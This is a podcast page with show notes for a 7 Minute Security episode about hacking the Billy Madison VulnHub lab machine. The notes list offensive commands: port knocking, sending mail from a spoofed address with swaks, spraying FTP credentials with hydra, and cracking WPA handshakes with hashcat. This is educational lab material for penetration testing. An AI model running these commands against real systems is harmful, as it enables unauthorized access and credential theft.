7 Minute Security

7 Minute Security

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

https://7ms.us/

Technology
News Tech News
subscribe
share






claim!
report

7MS #593: Hacking Billy Madison - Part 3

Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff:

  • Port knocking is awesome using utilities like knock:
/opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986
  • Sending emails via command line is made (fairly) easy with swaks:
swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

You could also use telnet and do this command by command - see this article from Black Hills Information Security for more info.

  • Hyda works good for spraying FTP creds:
hydra -l user -P passlist.txt ftp://192.168.0.1
  • Check out my quick cheat sheet about bettercap (see episode #522) for some syntax on extracting WPA handshake data from cap files:
# ...it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat: sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap # Then crack with hashcat! sudo /path/to/hashcat -m22000 readytocrack.hc2000 wordlist.txt

fyyd: Podcast Search Engine
share








 October 15, 2023  38m